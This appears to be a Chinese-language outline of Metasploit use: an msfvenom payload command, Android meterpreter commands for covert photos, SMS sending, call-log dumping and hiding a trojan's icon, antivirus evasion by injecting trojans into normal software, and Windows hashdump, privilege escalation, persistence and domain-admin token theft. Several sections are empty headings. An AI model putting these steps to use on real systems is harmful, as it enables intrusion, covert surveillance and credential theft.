文章目录
1.信息收集模块
2.密码破解模块
3.漏洞利用模块
4.shellcode使用及免杀
msfvenom 取代了 msfpayload命令
4.1.windows
msfvenom -p windows/exec CMD=“cmd /k calc” R
4.2.linux
4.3.Android
send_sms //从目标会话发送短消息
webcam_snap //隐秘拍照功能
webcam_snap //从指定的摄像头获取快照
check_root //检查设备是否有根
hide_app_icon //隐藏手机端木马程序图标
dump_calllog //获取通话记录
geolocate //获取手机的当前的经纬度
set_audio_mode //Set Ringer Mode
sqlite_query //Query a SQLite database from storage
wakelock // Enable/Disable Wakelock
wlan_geolocate // Get current lat-long using WLAN information
app_install // Request to install apk file
app_list // List installed apps in the device
app_run // Start Main Activty for package name
app_uninstall //Request to uninstall application
4.4.java
4.5.php
4.6.免杀
还可以通过使用Metasploit-shellter来向正常软件注入木马使其变成木马来免杀
5.meterpreter使用
切换到一个稳定的进程可以一直存留会话,例如explorer.exe
hashdump可以dump管理员hash值,然后使用hash值进行登录
use priv
run post/windows/gather/hashdump
getsystem 尝试将权限提升到本地系统权限或管理员权限
getuid
5.1.持久化控制PC(APT)
5.2.令牌假冒
(1)使用ps列举找到域的名字和域管理员用户名,并且记住对应进程PID
(2)使用steal_token PID假冒域管理员账号,如果成功Meterpreter就是以域管理员用户运行。